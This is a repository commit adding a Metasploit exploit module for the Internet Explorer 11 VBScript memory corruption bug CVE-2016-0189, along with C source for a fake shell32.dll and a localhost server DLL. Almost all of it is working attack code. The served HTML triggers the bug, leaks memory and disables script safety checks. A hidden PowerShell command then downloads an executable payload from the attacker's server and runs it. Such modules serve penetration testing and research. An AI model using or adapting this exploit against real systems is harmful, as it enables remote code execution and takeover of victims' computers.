Browse Source

Land #7172, Add exploit for CVE-2016-0189 (MSIE)

wchen-r7 3 years ago
parent
commit
2f6e0fb58c
No account linked to committer's email address

BIN
data/exploits/cve-2016-0189/ielocalserver.dll View File


BIN
data/exploits/cve-2016-0189/ieshell32.dll View File


+ 183
- 0
external/source/exploits/cve-2016-0189/ielocalserver.cpp View File

@@ -0,0 +1,183 @@
1
+/*
2
+From: https://gist.github.com/worawit/1213febe36aa8331e092
3
+
4
+Simple local HTTP server for IE (with no AppContainer) privilege escalation.
5
+
6
+I implemented local server instead of proxy in Ref because 
7
+local server is easier to code. But local server is less useful then proxy.
8
+
9
+Ref:
10
+http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/There-s-No-Place-Like-Localhost-A-Welcoming-Front-Door-To-Medium/ba-p/6560786#.U9v5smN5FHb
11
+
12
+Note:
13
+From my test, by default IE does not configure intranet site.
14
+With this default, localhost is treated as internet site (run as low integrity).
15
+*/
16
+#define _CRT_SECURE_NO_WARNINGS
17
+#define WIN32_LEAN_AND_MEAN
18
+#include <winsock2.h>
19
+#include <stdio.h>
20
+#include <string.h>
21
+
22
+#pragma comment(lib, "ws2_32.lib")
23
+
24
+#define SERVER_PORT 5555
25
+
26
+static HANDLE hThread = NULL;
27
+
28
+static WCHAR stage2file[256];
29
+
30
+static SOCKET serverSk = INVALID_SOCKET;
31
+static SOCKET peerSk = INVALID_SOCKET;
32
+
33
+static SOCKET create_server()
34
+{
35
+	struct sockaddr_in skAddr;
36
+	SOCKET sk;
37
+	int optval;
38
+
39
+	sk = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
40
+	if (sk == INVALID_SOCKET)
41
+		return INVALID_SOCKET;
42
+
43
+	optval = 1;
44
+	setsockopt(sk, SOL_SOCKET, SO_REUSEADDR, (char*) &optval, sizeof(optval));
45
+
46
+	memset(&skAddr, 0, sizeof(skAddr));
47
+	skAddr.sin_family = AF_INET;
48
+	skAddr.sin_port = htons(SERVER_PORT);
49
+	skAddr.sin_addr.s_addr = inet_addr("127.0.0.1");
50
+
51
+	if (bind(sk, (struct sockaddr *) &skAddr, sizeof(skAddr)) != 0)
52
+		goto on_error;
53
+
54
+	if (listen(sk, 5) != 0)
55
+		goto on_error;
56
+
57
+	return sk;
58
+
59
+on_error:
60
+	closesocket(sk);
61
+	return SOCKET_ERROR;
62
+}
63
+
64
+static int send_all(SOCKET sk, char *buffer, int size)
65
+{
66
+	int len;
67
+	while (size > 0) {
68
+		len = send(sk, buffer, size, 0);
69
+		if (len <= 0)
70
+			return 0;
71
+		buffer += len;
72
+		size -= len;
73
+	}
74
+
75
+	return 1;
76
+}
77
+
78
+static int local_server()
79
+{
80
+	int len;
81
+	int totalSize;
82
+	char buffer[4096];
83
+	HANDLE hFile = INVALID_HANDLE_VALUE;
84
+
85
+	serverSk = create_server();
86
+	if (serverSk == INVALID_SOCKET)
87
+		return SOCKET_ERROR;
88
+
89
+	while (1) {
90
+		peerSk = accept(serverSk, NULL, NULL);
91
+		if (peerSk == INVALID_SOCKET) {
92
+			continue;
93
+		}
94
+
95
+		len = recv(peerSk, buffer, sizeof(buffer), 0);
96
+		if (len <= 0)
97
+			goto closepeer;
98
+
99
+		hFile = CreateFile(stage2file, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
100
+		if (hFile == INVALID_HANDLE_VALUE)
101
+			break;
102
+
103
+		totalSize = GetFileSize(hFile, NULL);
104
+		if (totalSize == INVALID_FILE_SIZE)
105
+			break;
106
+
107
+		len = _snprintf(buffer, sizeof(buffer), 
108
+			"HTTP/1.1 200 OK\r\n"
109
+			"Content-Type: text/html\r\n"
110
+			"Connection: Close\r\n"
111
+			"Content-Length: %d\r\n"
112
+			"\r\n",
113
+			totalSize
114
+		);
115
+		send_all(peerSk, buffer, len);
116
+
117
+		while (totalSize > 0) {
118
+			ReadFile(hFile, buffer, sizeof(buffer), (DWORD*) &len, NULL);
119
+			send_all(peerSk, buffer, len);
120
+			totalSize -= len;
121
+		}
122
+		CloseHandle(hFile);
123
+		hFile = INVALID_HANDLE_VALUE;
124
+
125
+closepeer:
126
+		closesocket(peerSk);
127
+		peerSk = INVALID_SOCKET;
128
+	}
129
+
130
+	if (hFile != INVALID_HANDLE_VALUE) {
131
+		CloseHandle(hFile);
132
+	}
133
+	if (peerSk != INVALID_SOCKET) {
134
+		closesocket(peerSk);
135
+		peerSk = INVALID_SOCKET;
136
+	}
137
+	if (serverSk != INVALID_SOCKET) {
138
+		closesocket(serverSk);
139
+		serverSk = INVALID_SOCKET;
140
+	}
141
+
142
+	return 0;
143
+}
144
+
145
+DWORD WINAPI threadProc(void *param)
146
+{
147
+	WSADATA wsaData;
148
+	WSAStartup(MAKEWORD(2 ,2), &wsaData);
149
+
150
+	local_server();
151
+
152
+	WSACleanup();
153
+
154
+	DeleteFile(stage2file);
155
+	return 0;
156
+}
157
+
158
+void do_work()
159
+{
160
+	GetEnvironmentVariableW(L"stage2file", stage2file, sizeof(stage2file));
161
+
162
+	hThread = CreateThread(NULL, 0, threadProc, NULL, 0, NULL);
163
+}
164
+
165
+BOOL APIENTRY DllMain( HMODULE hModule,
166
+                       DWORD  ul_reason_for_call,
167
+                       LPVOID lpReserved
168
+					 )
169
+{
170
+	switch (ul_reason_for_call)
171
+	{
172
+	case DLL_PROCESS_ATTACH:
173
+		do_work();
174
+		break;
175
+	case DLL_PROCESS_DETACH:
176
+		if (hThread) {
177
+			WaitForSingleObject(hThread, INFINITE);
178
+			CloseHandle(hThread);
179
+		}
180
+		break;
181
+	}
182
+	return TRUE;
183
+}

+ 39
- 0
external/source/exploits/cve-2016-0189/ieshell32.cpp View File

@@ -0,0 +1,39 @@
1
+/*
2
+From: https://gist.github.com/worawit/1213febe36aa8331e092
3
+
4
+Fake shell32.dll to be loaded after modified %SystemRoot%
5
+*/
6
+#define WIN32_LEAN_AND_MEAN
7
+#include <windows.h>
8
+
9
+static void do_work()
10
+{
11
+	WCHAR envBuffer[256];
12
+
13
+	GetEnvironmentVariableW(L"SaveSystemRoot", envBuffer, sizeof(envBuffer));
14
+	// restore system root
15
+	SetEnvironmentVariableW(L"SystemRoot", envBuffer);
16
+	//SetEnvironmentVariableW(L"SaveSystemRoot", NULL);
17
+
18
+	GetEnvironmentVariableW(L"MyDllPath", envBuffer, sizeof(envBuffer));
19
+	SetEnvironmentVariableW(L"MyDllPath", NULL);
20
+
21
+	// shell32.dll will be unloaded, use another dll
22
+	LoadLibraryExW(envBuffer, NULL, LOAD_WITH_ALTERED_SEARCH_PATH);
23
+}
24
+
25
+BOOL APIENTRY DllMain( HMODULE hModule,
26
+                       DWORD  ul_reason_for_call,
27
+                       LPVOID lpReserved
28
+					 )
29
+{
30
+	switch (ul_reason_for_call)
31
+	{
32
+	case DLL_PROCESS_ATTACH:
33
+		do_work();
34
+		break;
35
+	case DLL_PROCESS_DETACH:
36
+		break;
37
+	}
38
+	return TRUE;
39
+}

+ 482
- 0
modules/exploits/windows/browser/ms16_051_vbscript.rb View File

@@ -0,0 +1,482 @@
1
+##
2
+# This module requires Metasploit: http://metasploit.com/download
3
+# Current source: https://github.com/rapid7/metasploit-framework
4
+##
5
+
6
+require 'msf/core'
7
+
8
+class MetasploitModule < Msf::Exploit::Remote
9
+  Rank = NormalRanking
10
+
11
+  include Msf::Exploit::Remote::HttpServer
12
+  include Msf::Exploit::EXE
13
+
14
+  def initialize(info={})
15
+    super(update_info(info,
16
+      'Name'           => "Internet Explorer 11 VBScript Engine Memory Corruption",
17
+      'Description'    => %q{
18
+        This module exploits the memory corruption vulnerability (CVE-2016-0189)
19
+        present in the VBScript engine of Internet Explorer 11.
20
+      },
21
+      'License'        => MSF_LICENSE,
22
+      'Author'         => [
23
+          'Theori',                                              # Original RE research and exploitation
24
+          'William Webb <william_webb[at]rapid7.com>'            # Metasploit module
25
+        ],
26
+      'Platform'       => 'win',
27
+      'Targets'        =>
28
+        [
29
+          [ 'Automatic', {} ],
30
+          [ 'Windows 10 with IE 11', { } ]
31
+        ],
32
+      'References'     =>
33
+        [
34
+          [ 'CVE', '2016-0189' ],
35
+          [ 'MSB', 'MS16-051' ]
36
+        ],
37
+      'Arch'           => ARCH_X86_64,
38
+      'DisclosureDate' => "May 10 2016",
39
+      'DefaultTarget'  => 0))
40
+  end
41
+
42
+  def setup
43
+    # @stage2html = Rex::Text.rand_text_alphanum(6)
44
+    @ieshell          = "#{Rex::Text.rand_text_alphanumeric(6)}"       # ieshell32.dll uri
45
+    @localsrv         = "#{Rex::Text.rand_text_alphanumeric(6)}"       # ielocalserver.dll uri
46
+    @pm_escape_html   = "#{Rex::Text.rand_text_alphanumeric(6)}"       # vbscipt_godmode.html
47
+    @payload_uri      = "#{Rex::Text.rand_text_alphanumeric(8)}"
48
+    @payload_exe      = "#{Rex::Text.rand_text_alpha(6)}.exe"
49
+    File.open(File.join( Msf::Config.data_directory, "exploits", "cve-2016-0189", "ieshell32.dll" ), "rb") { |f| @stage2dll = f.read }
50
+    File.open(File.join( Msf::Config.data_directory, "exploits", "cve-2016-0189", "ielocalserver.dll" ), "rb") { |f| @localserver = f.read }
51
+    super
52
+  end
53
+
54
+  def exploit_html(req_uri)
55
+    srvhost = datastore['SRVHOST']
56
+    srvport = datastore['SRVPORT']
57
+
58
+    template = <<-EOF
59
+    <html>
60
+    <head>
61
+    <meta http-equiv="x-ua-compatible" content="IE=10">
62
+    </head>
63
+    <body>
64
+
65
+        <script type="text/vbscript">
66
+            Dim downloadFiles
67
+            Dim cacheRegex
68
+            Dim cacheFiles(3)
69
+
70
+            Dim downloadState
71
+            Dim pinTime
72
+
73
+            Dim oFSO
74
+            Dim oWS
75
+            Dim shell
76
+
77
+            function FindFile(path, regexFile)
78
+                FindFile = ""
79
+                For Each f in oFSO.GetFolder(path).Files
80
+                    If regexFile.Test(f.Name) Then
81
+                        FindFile = f.Name
82
+                        Exit For
83
+                    End If
84
+                Next
85
+            end function
86
+
87
+            function SearchCache(path, regexFile)
88
+                SearchCache = ""
89
+                For Each fld in oFSO.GetFolder(path).SubFolders
90
+                    'If DateDiff("s", pinTime, fld.DateLastModified) >= 0 Then
91
+                        filename = FindFile(path & "\\" & fld.Name, regexFile)
92
+                        If filename <> "" Then
93
+                            SearchCache = path & "\\" & fld.Name & "\\" & filename
94
+                            Exit For
95
+                        End If
96
+                    'End If
97
+                Next
98
+            end function
99
+
100
+            function loaddll()
101
+                On Error Resume Next
102
+
103
+                Set wshSystemEnv = oWS.Environment("Process")
104
+                tmpDir = oFSO.GetSpecialFolder(2)
105
+
106
+                tmpSysDir = tmpDir & "\\System32"
107
+                tmpShellFile = tmpSysDir & "\\shell32.dll"
108
+                oFSO.CreateFolder(tmpSysDir)
109
+                oFSO.MoveFile cacheFiles(0), tmpShellFile
110
+
111
+                mydllFile = tmpDir & "\\" & downloadFiles(1)
112
+                oFSO.MoveFile cacheFiles(1), mydllFile
113
+                wshSystemEnv("MyDllPath") = mydllFile
114
+
115
+                If (UBound(downloadFiles) = 2) Then
116
+                    stage2File = tmpDir & "\\#{@pm_escape_html}.html"
117
+                    oFSO.MoveFile cacheFiles(2), stage2File
118
+                    wshSystemEnv("stage2file") = stage2File
119
+                End If
120
+
121
+                saveRoot = wshSystemEnv("SystemRoot")
122
+                wshSystemEnv("SaveSystemRoot") = saveRoot
123
+                wshSystemEnv("SystemRoot") = tmpDir
124
+                Set shell = CreateObject("Shell.Application")
125
+
126
+                If (UBound(downloadFiles) = 2) Then
127
+                    call tolocal()
128
+                End If
129
+            end function
130
+
131
+            Sub OnDownloadDone()
132
+                If InStr(userAgent, "NT 5.") > 0 Then
133
+                    cacheDir = oWS.ExpandEnvironmentStrings("%USERPROFILE%")
134
+                    cacheDir = cacheDir & "\\Local Settings\\Temporary Internet Files\\Low\\IE"
135
+                Else
136
+                    cacheDir = oWS.ExpandEnvironmentStrings("%LOCALAPPDATA%")
137
+                    cacheDir = cacheDir & "\\Microsoft\\Windows\\Temporary Internet Files\\Low\\IE"
138
+                End If
139
+
140
+                Set regexFile = new regexp
141
+                regexFile.Pattern = cacheRegex(downloadState)
142
+                cacheFiles(downloadState) = SearchCache(cacheDir, regexFile)
143
+                If cacheFiles(downloadState) = "" Then
144
+                    Exit Sub
145
+                End If
146
+
147
+                If downloadState = UBound(downloadFiles) Then
148
+                    loaddll()
149
+                Else
150
+                    downloadState = downloadState + 1
151
+                    DoDownload()
152
+                End If
153
+            End Sub
154
+
155
+            Sub DoDownload()
156
+                pinTime = Now
157
+                call getdll(downloadFiles(downloadState))
158
+            End Sub
159
+
160
+        Sub runshell()
161
+            downloadFiles = Array("#{@ieshell}.dll", "#{@localsrv}.dll", "#{@pm_escape_html}.html")
162
+            cacheRegex = Array("^#{@ieshell}\\[\\d\\].dll$", "^#{@localsrv}\\[\\d\\].dll$", "^#{@pm_escape_html}\\[\\d\\].htm$")
163
+            Set oFSO = CreateObject("Scripting.FileSystemObject")
164
+            Set oWS = CreateObject("WScript.Shell")
165
+            downloadState = 0
166
+            DoDownload()
167
+        End Sub
168
+
169
+        </script>
170
+
171
+        <script type="text/vbscript">
172
+            Dim bl
173
+            Dim plunge(32)
174
+            Dim y(32)
175
+            prefix = "%u4141%u4141"
176
+            d = prefix & "%u0016%u4141%u4141%u4141%u4242%u4242"
177
+            b = String(64000, "D")
178
+            c = d & b
179
+            x = UnEscape(c)
180
+
181
+            Class ArrayWrapper
182
+                Dim A
183
+
184
+                Private Sub Class_Initialize
185
+                    ReDim Preserve AA(1, 2000)
186
+                    A = AA
187
+                End Sub
188
+
189
+                Public Sub Resize()
190
+                    ReDim Preserve A(1, 1)
191
+                End Sub
192
+            End Class
193
+
194
+            Class Spray
195
+            End Class
196
+
197
+
198
+            Function getAddr (arg1, s)
199
+          bl = Null
200
+          Set bl = New ArrayWrapper
201
+
202
+          For i = 0 To 32
203
+            Set plunge(i) = s
204
+          Next
205
+
206
+                Set bl.A(arg1, 2) = s
207
+
208
+          Dim addr
209
+                Dim i
210
+                For i = 0 To 31
211
+                    If Asc(Mid(y(i), 3, 1)) = VarType(s) Then
212
+                        addr = strToInt(Mid(y(i), 3 + 4, 2))
213
+                    End If
214
+            y(i) = Null
215
+                Next
216
+
217
+          If addr = Null Then
218
+            document.location.href = document.location.href
219
+            Return
220
+          End If
221
+
222
+          getAddr = addr
223
+        End Function
224
+
225
+        Function leakMem (arg1, addr)
226
+          d = prefix & "%u0008%u4141%u4141%u4141"
227
+                c = d & intToStr(addr) & b
228
+                x = UnEscape(c)
229
+
230
+          bl = Null
231
+                Set bl = New ArrayWrapper
232
+
233
+                Dim o
234
+                o = bl.A(arg1, 2)
235
+
236
+          leakMem = o
237
+        End Function
238
+
239
+        Sub overwrite (arg1, addr)
240
+          d = prefix & "%u400C%u0000%u0000%u0000"
241
+                c = d & intToStr(addr) & b
242
+                x = UnEscape(c)
243
+
244
+          bl = Null
245
+                Set bl = New ArrayWrapper
246
+                bl.A(arg1, 2) = CSng(0)
247
+        End Sub
248
+
249
+            Function exploit (arg1)
250
+                Dim addr
251
+                Dim csession
252
+                Dim olescript
253
+                Dim mem
254
+
255
+          Set sp = New Spray
256
+          addr = getAddr(arg1, sp)
257
+          mem = leakMem(arg1, addr + 8)
258
+          csession = strToInt(Mid(mem, 3, 2))
259
+          mem = leakMem(arg1, csession + 4)
260
+          olescript = strToInt(Mid(mem, 1, 2))
261
+          overwrite arg1, olescript + &H174
262
+          runshell()
263
+
264
+        End Function
265
+
266
+            Function triggerBug
267
+                bl.Resize()
268
+
269
+                Dim i
270
+                For i = 0 To 32
271
+                    y(i) = Mid(x, 1, 24000)
272
+                Next
273
+            End Function
274
+        </script>
275
+
276
+        <script type="text/javascript">
277
+            var userAgent = navigator.userAgent;
278
+            var oReq;
279
+            function getdll(downloadFile)
280
+            {
281
+                oReq = new XMLHttpRequest();
282
+                oReq.open("GET", "http://#{srvhost}:#{srvport}#{req_uri}/"+downloadFile, true);
283
+                oReq.onreadystatechange = handler;
284
+                oReq.send();
285
+            }
286
+            function handler()
287
+            {
288
+                if (oReq.readyState == 4 && oReq.status == 200) {
289
+                    OnDownloadDone();
290
+                }
291
+            }
292
+            function tolocal()
293
+            {
294
+                location.href = "http://localhost:5555/#{@pm_escape_html}.html";
295
+            }
296
+            function strToInt(s)
297
+            {
298
+                return s.charCodeAt(0) | (s.charCodeAt(1) << 16);
299
+            }
300
+            function intToStr(x)
301
+            {
302
+                return String.fromCharCode(x & 0xffff) + String.fromCharCode(x >> 16);
303
+            }
304
+            var o;
305
+            o = {"valueOf": function () {
306
+                    triggerBug();
307
+                    return 1;
308
+                }};
309
+            setTimeout(function() {exploit(o);}, 50);
310
+        </script>
311
+    </body>
312
+    </html>
313
+        EOF
314
+
315
+    template
316
+  end
317
+
318
+  def stage2_html(req_uri)
319
+
320
+    template = <<-EOF
321
+    <html>
322
+    <head>
323
+    <meta http-equiv="x-ua-compatible" content="IE=10">
324
+    </head>
325
+    <body>
326
+        <script type="text/vbscript">
327
+            Dim aw
328
+            Dim plunge(32)
329
+            Dim y(32)
330
+            prefix = "%u4141%u4141"
331
+            d = prefix & "%u0016%u4141%u4141%u4141%u4242%u4242"
332
+            b = String(64000, "D")
333
+            c = d & b
334
+            x = UnEscape(c)
335
+
336
+            Class ArrayWrapper
337
+                Dim A()
338
+                Private Sub Class_Initialize
339
+                    ReDim Preserve A(1, 2000)
340
+                End Sub
341
+
342
+                Public Sub Resize()
343
+                    ReDim Preserve A(1, 1)
344
+                End Sub
345
+            End Class
346
+
347
+            Class Dummy
348
+            End Class
349
+
350
+            Function getAddr (arg1, s)
351
+                aw = Null
352
+                Set aw = New ArrayWrapper
353
+
354
+                For i = 0 To 32
355
+                    Set plunge(i) = s
356
+                Next
357
+
358
+                Set aw.A(arg1, 2) = s
359
+
360
+                Dim addr
361
+                Dim i
362
+                For i = 0 To 31
363
+                    If Asc(Mid(y(i), 3, 1)) = VarType(s) Then
364
+                        addr = strToInt(Mid(y(i), 3 + 4, 2))
365
+                    End If
366
+                    y(i) = Null
367
+                Next
368
+
369
+                If addr = Null Then
370
+                    document.location.href = document.location.href
371
+                    Return
372
+                End If
373
+
374
+                getAddr = addr
375
+            End Function
376
+
377
+            Function leakMem (arg1, addr)
378
+                d = prefix & "%u0008%u4141%u4141%u4141"
379
+                c = d & intToStr(addr) & b
380
+                x = UnEscape(c)
381
+
382
+                aw = Null
383
+                Set aw = New ArrayWrapper
384
+
385
+                Dim o
386
+                o = aw.A(arg1, 2)
387
+
388
+                leakMem = o
389
+            End Function
390
+
391
+            Sub overwrite (arg1, addr)
392
+                d = prefix & "%u400C%u0000%u0000%u0000"
393
+                c = d & intToStr(addr) & b
394
+                x = UnEscape(c)
395
+
396
+                aw = Null
397
+                Set aw = New ArrayWrapper
398
+                aw.A(arg1, 2) = CSng(0)
399
+            End Sub
400
+
401
+            Function exploit (arg1)
402
+                Dim addr
403
+                Dim csession
404
+                Dim olescript
405
+                Dim mem
406
+
407
+                Set dm = New Dummy
408
+                addr = getAddr(arg1, dm)
409
+                mem = leakMem(arg1, addr + 8)
410
+                csession = strToInt(Mid(mem, 3, 2))
411
+                mem = leakMem(arg1, csession + 4)
412
+                olescript = strToInt(Mid(mem, 1, 2))
413
+                overwrite arg1, olescript + &H174
414
+
415
+                Set shObj = CreateObject("Wscript.shell")
416
+                shObj.Run("PowerShell -nologo -WindowStyle Hidden $d=$env:temp+'\\#{@payload_exe}';(New-Object System.Net.WebClient).DownloadFile('http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{req_uri}/#{@payload_uri}',$d);Start-Process $d")
417
+                shObj.Run("%temp%\\#{@payload_exe}")
418
+
419
+            End Function
420
+
421
+            Function triggerBug
422
+                aw.Resize()
423
+
424
+                Dim i
425
+                For i = 0 To 32
426
+                    y(i) = Mid(x, 1, 24000)
427
+                Next
428
+            End Function
429
+        </script>
430
+
431
+        <script type="text/javascript">
432
+            function strToInt(s)
433
+            {
434
+                return s.charCodeAt(0) | (s.charCodeAt(1) << 16);
435
+            }
436
+            function intToStr(x)
437
+            {
438
+                return String.fromCharCode(x & 0xffff) + String.fromCharCode(x >> 16);
439
+            }
440
+            var o;
441
+            o = {"valueOf": function () {
442
+                    triggerBug();
443
+                    return 1;
444
+                }};
445
+            setTimeout(function() {exploit(o);}, 50);
446
+        </script>
447
+    </body>
448
+    </html>
449
+
450
+      EOF
451
+      template
452
+  end
453
+
454
+  def on_request_uri(cli, request)
455
+    # used for some debugging stuff
456
+    ies = @ieshell
457
+    ls  = @localsrv
458
+    pm  = @pm_escape_html
459
+
460
+    print_status("Received request: #{request.uri}")
461
+      if request.uri =~ /.*#{ies}.*$/
462
+        print_status("Sending stage two DLL ...")
463
+        send_response(cli, @stage2dll, { 'Content-Type' => 'application/x-msdownload', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })
464
+      elsif request.uri =~ /.*#{ls}.*$/
465
+        print_status("Sending local server DLL ...")
466
+        send_response(cli, @localserver, { 'Content-Type' => 'application/x-msdownload', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })
467
+      elsif request.uri =~ /.*#{pm}.*$/
468
+        rq = "#{get_resource.chomp('/')}"
469
+        gm = stage2_html(rq)
470
+        send_response(cli, gm, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })
471
+      elsif request.uri =~ /.*#{@payload_uri}$/
472
+        return if ((payload = regenerate_payload(cli)) == nil)
473
+        print_status("Sending payload ...")
474
+        send_response(cli, generate_payload_exe({ :code => payload.encoded }), { 'Content-Type' => 'application/octet-stream', 'Connection' => 'close' })
475
+      else
476
+        print_status("Sending main page ..")
477
+        send_response(cli, exploit_html(request.uri))
478
+      end
479
+  end
480
+
481
+end
482
+

Loading…
Cancel
Save